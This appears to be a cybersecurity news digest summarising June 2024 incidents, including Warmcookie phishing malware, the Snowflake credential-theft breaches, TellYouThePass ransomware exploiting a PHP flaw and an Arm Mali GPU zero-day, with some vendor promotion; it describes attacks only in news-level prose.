Daily Brief

Managed service providers (MSPs) are increasingly relied upon for comprehensive cybersecurity services as cyber threats escalate. Cynet's All-in-One Cybersecurity Platform offers a unified solution encompassing a range of security capabilities, simplifying the tech stack for MSPs. The platform features Extended Detection and Response (XDR), Endpoint Protection (EPP), Managed Detection and Response (MDR), and other critical tools in a single system. Automation and expert support from Cynet's in-house team, CyOps, significantly reduce response times and manual intervention during security incidents. Cynet's performance in the recent MIT an indow MITRE ATT&CK Evaluations demonstrated 100% Detection and Analytic Coverage without configuration changes, establishing a strong competitive edge. The streamlined approach, efficiency, and comprehensive coverage provided by Cynet allow MSPs to increase their profit margins while enhancing service quality. Cynet's offerings enable MSPs to position themselves as top-tier providers in the cybersecurity market, effectively expanding their client base and business impact.

Elastic Security Labs discovered a new Windows malware, "Warmcookie," distributed via fake job offer phishing campaigns. Warmcookie is designed to infiltrate and persist in corporate networks, collecting extensive information about infected hosts. The malware is delivered through emails that mimic legitimate job offers, using personalized touches such as the recipient's name and employer. Victims are tricked into downloading a JavaScript file, which then downloads and executes the Warmcookie DLL via PowerShell and BITS. Upon installation, Warmcookie establishes routine communication with a C2 server and sets up a task to run every 10 minutes. The backdoor's capabilities include machine fingerprinting, screenshot capturing, and possible deployment of additional payloads. Elastic's analysts warn that despite being a new entry, Warmcookie poses significant risks due to its advanced functionalities and continuous development.

Chinese actor SecShow, linked to the China Education and Research Network, has been conducting DNS probing internationally since June 2023. The purpose of the DNS probes, aimed at open resolvers, remains uncertain but could potentially facilitate malicious activities. Strategies involve utilizing CERNET nameservers to identify open DNS resolvers and manipulate DNS response behaviors. Each DNS query generates a different random IP address, unintentionally amplified by Palo Alto Cortex Xpanse's query attempts. Previous disclosures by Dataplane.org and Unit 42 highlighted similar scanning activities by this actor. This DNS probing forms part of a pattern, following another China-linked actor, Muddling Meerkat, known for DNS queries blending with global traffic. SecShow nameservers ceased responding as of mid-May 2024, marking an endpoint to this particular probing activity.

TellYouThePass ransomware exploited the CVE-2024-4577 PHP vulnerability for server attacks less than 48 hours after fixes were issued. Researchers discovered the ransomware delivering webshells and running the encryptor via a Windows executable to breach systems. The ransomware leverages a VBScript within an HTA file to load and execute its payload, effectively encrypting files on the compromised server. Attackers demand a ransom payment in Bitcoin, specifically 0.1 BTC, which is roughly $6,700, for decryption keys. Over 450,000 exposed PHP servers remain potentially vulnerable, significantly in the U.S. and Germany, increasing the risk of further exploits. Security firms observed rapid use of publicly available exploit code immediately following vulnerability disclosures and patch releases. Victims report multiple website encryptors underlining the broad impact and effectiveness of the campaign on exposed servers.

The UK's Information Commissioner's Office and Canada's Privacy Commissioner are conducting a joint investigation into the 23andMe data breach impacting nearly 7 million users. The investigation will assess the harm caused to customers, the adequateness of security measures in place, and the transparency of the company with regulators. The breach was detected after five months when information appeared on Reddit, rather than through internal security efforts. Sensitive data, including genetic information, was accessed, possibly affecting user privacy and security on a large scale. The attackers targeted specific user groups and used credential stuffing to breach around 14,000 accounts, exploiting weak user security practices. The breach has raised concerns about the misuse of genetic data and the responsibility of companies in safeguarding user information. Following the breach, 23andMe enabled two-factor authentication by default, a security improvement that came after the breach was identified. 23andMe has pledged to cooperate with the regulatory bodies during the investigation, which remains ongoing with no further comments until its conclusion.

Pure Storage acknowledged a breach in its Snowflake workspace, leading to unauthorized access to telemetry data. The exposed information included customer names, LDAP usernames, and email addresses, but crucially no credentials for array access. Following the incident, Pure Storage implemented security measures to prevent future unauthorized access. The attack affected customer telemetry used for proactive support services, not involving broader customer infrastructure or stored data. Snowflake, alongside Mandiant and CrowdStrike, indicated attacks utilized stolen credentials targeting accounts without multi-factor authentication. Over 165 organizations have been potentially impacted by similar Snowflake account breaches initiated by threat actor UNC5537. The broader issue is linked to credentials stolen via infostealer malware since 2020, highlighting the need for credential rotation and updated security measures.

Vonahi Security's annual report reveals critical findings from over 10,000 network pentests conducted across more than 1,200 organizations. Key vulnerabilities identified include DNS spoofing vulnerabilities such as Multicast DNS (mDNS) and NetBIOS Name Service (NBNS) spoofing. Other severe threats involve outdated Microsoft Windows systems and the exploitation of Windows Remote Code Execution (RCE) vulnerabilities like BlueKeep and EternalBlue. Issues like IPMI authentication bypass and local administrator password reuse were highlighted, increasing the risk of widespread security breaches. Dell EMC iDRAC devices were found to have CGI injection vulnerabilities, potentially allowing root-level commands execution by attackers. Common root causes for these vulnerabilities include configuration weaknesses and patching deficiencies. The report emphasizes the need for more frequent penetration testing beyond the conventional annual schedule to identify and address vulnerabilities in a timely manner. Vonahi's vPenTest platform offers automated, continuous network penetration testing to help organizations proactively manage and mitigate cybersecurity risks.

Apple introduced a new AI processing cloud system called Private Cloud Compute (PCC), ensuring user privacy by processing AI tasks in a secure cloud environment. PCC, part of Apple Intelligence, supports new generative AI features in iOS 18, iPadOS 18, and macOS Sequoia, using both on-device and cloud computing. The system integrates ChatGPT into Siri and systemwide Writing Tools, with enhanced privacy measures including obscured IP addresses and non-retention of requests by OpenAI. Apple's security infrastructure for PCC includes a custom server node design with Apple silicon, and security protocols such as Secure Enclave, Secure Boot, and sandboxing. PCC requests are routed through Oblivious HTTP (OHTTP) relays managed by an independent party, hiding the source IP addresses to prevent potential attacks. Independent security experts can inspect the source code running on Apple’s servers, with all software images being published for public examination to verify privacy claims. New privacy control features are also introduced, including app lock options with Face ID or Touch ID, a dedicated Passwords app, and a refreshed Privacy & Security section in Settings. Apple Intelligence and its new features will be available on newer hardware models and are restricted to settings in U.S. English.

Cybersecurity researchers have detected an enhanced version of the ValleyRAT malware, now equipped with additional capabilities like screenshot capture, process filtering, and logging activities management. The malware is linked to a China-based threat actor and is involved in phishing campaigns aimed at Chinese and Japanese organizations, suggesting a targeted cyber-espionage effort. ValleyRAT operates through a sophisticated multi-stage infection process, utilizing legitimate software to sideload malicious DLLs and establish persistence on the target system. The malware sequence starts with a downloader using HTTP File Server (HFS) to pull malicious files, which then decrypt to facilitate further downloads and execute operations to evade anti-malware tools. Once established, the malware uses a complex mechanism involving shellcode injection into the system processes to communicate with its command-and-control server and download the final payload. The latest findings come amidst other cybersecurity alerts, including the discovery of an updated Agent Tesla campaign targeting Spanish speakers, underlining the continuous evolution and diversification of cyber threats. The implications of such malware advancements stress the importance of robust cybersecurity measures and continuous system monitoring to mitigate potential risks from state-linked cyber activities and sophisticated malware campaigns.

Snowflake reported a significant data breach impacting 165 customer accounts, linked to an extortion campaign by threat group UNC5537. The breach, facilitated by stolen credentials, involved posting victim data for sale and attempting to extort affected customers. Mandiant, the threat intelligence firm tracking this operation, described the hackers as financially motivated and operating primarily in North America, with affiliates in Turkey. The hacking campaign exploited weaknesses such as insufficient multi-factor authentication, infrequent credential rotation, and lax access controls. Malware such as Lumma, MetaStealer, Raccoon, RedLine, RisePro, and Vidar was used to obtain the credentials, with infections often occurring on contractor devices engaged in high-risk behaviors. UNC5537 employed tools like FROSTBITE and DBeaver Ultimate to conduct reconnaissance and extract information from Snowflake systems. Snowflake is bolstering its security protocols, mandating advanced controls like MFA, and working closely with affected clients to improve defenses. The operation and its scale underscore the growing threat from credential theft and the commercialization of infostealer malware affecting many SaaS platforms.

Arm has announced a zero-day vulnerability, CVE-2024-4610, in Mali GPU Kernel Drivers that is actively being exploited. The vulnerability, described as a use-after-free issue, allows unauthorized access to freed GPU memory. Affected drivers, specifically Bifrost and Valhall GPU Kernel Driver r41p0, have been patched as of November 2022. Current driver version r49p0 was released in April 2024. The flaw has been reportedly exploited in real-world attacks, though specific details haven't been disclosed by Arm. Previous CVEs in Mali GPU have been used in targeted spyware attacks by commercial vendors, notably affecting Android devices. Users of any affected products are strongly advised to update their systems to the latest secure driver version. Arm and security resources emphasize the importance of ongoing monitoring and regular updates to mitigate such vulnerabilities.

Mandiant reported that a cybercriminal group, using the identifier UNC5537, compromised over 165 Snowflake customer databases. The attackers, potentially linked with the Scattered Spider group (UNC3944), exploited stolen credentials to access and exfiltrate data. The breaches are traced back to compromised customer credentials rather than a breach of Snowflake’s corporate environment. Initial access was gained via Snowflake’s web-based user interface or a command line interface, using stolen credentials dating back to 2020. UNC5537 utilized a custom tool named "FROSTBITE" for recon and to exfiltrate data; compromised systems often lacked multi-factor authentication (MFA). The stolen data was sold online by May 2024, following the breach’s detection in April. Many affected systems belonged to contractors using personal devices for work, highlighting a key vulnerability. Mandiant recommends implementing MFA and regular credential rotation to prevent similar cybersecurity incidents.

Kadokawa, a large Japanese media conglomerate, experienced a significant cyber attack, resulting in the shutdown of several servers including those for the video-sharing site Niconico and e-commerce service Ebiten. The attack was detected early on Saturday, June 8, and led to a four-day offline period for Kadokawa and its associated properties. A temporary static HTML site has been set up for Kadokawa’s corporate site, while Niconico remains offline, currently undergoing a complete rebuild. Early investigations into the attack are ongoing, with no clear resolution or understanding of the nature of the attack reported yet. Niconico, being the second-most-popular video-sharing site in Japan, has profoundly impacted both viewers and content creators who rely on it for income. Despite the e-commerce service Ebiten's inability to send confirmation emails, it reassures customers that product orders will still be fulfilled, indicating some operational back-office functions remain unaffected. No specific details about the cyber attack have been disclosed by Kadokada, and there is no timeframe provided for when services will be fully restored.

Arm has reported a use-after-free (UAF) vulnerability in its Bifrost and Valhall GPU kernel drivers, affecting versions r34p0 through r40p0. Tracked as CVE-2024-4610, this vulnerability allows unprivileged users to execute arbitrary code by accessing freed memory. The flaw has been confirmed to be exploited in the wild, posing significant security risks for device users. Arm has released a patch (version r41p0) in November 2022 to address this issue, with the latest available version being r49p0. There may be delays in patch delivery to end users due to complex supply chain interactions among Arm, device manufacturers, and carriers. Bifrost and Valhall GPUs are integrated into a wide range of devices, including smartphones, tablets, Chromebooks, and embedded systems. Some older devices with these GPUs may not receive security updates, leaving them vulnerable to exploitation.

GitHub users targeted by phishing attacks impersonating official security and recruitment emails. Attackers use malicious OAuth apps to gain unauthorized access to private repositories and user data. Victims receive deceptive emails after being tagged in manipulated comments or pull requests. Phishing sites, disguised as GitHub career pages, trick victims into authorizing harmful OAuth apps. Compromised accounts result in wiped repositories and locked-out users, with attackers demanding contact via Telegram for data restoration. GitHub has been aware of and addressing the issue since February, advising users to report any suspicious activities. Previous related phishing incidents in September 2020 involved fake CircleCI notifications aimed at stealing GitHub credentials.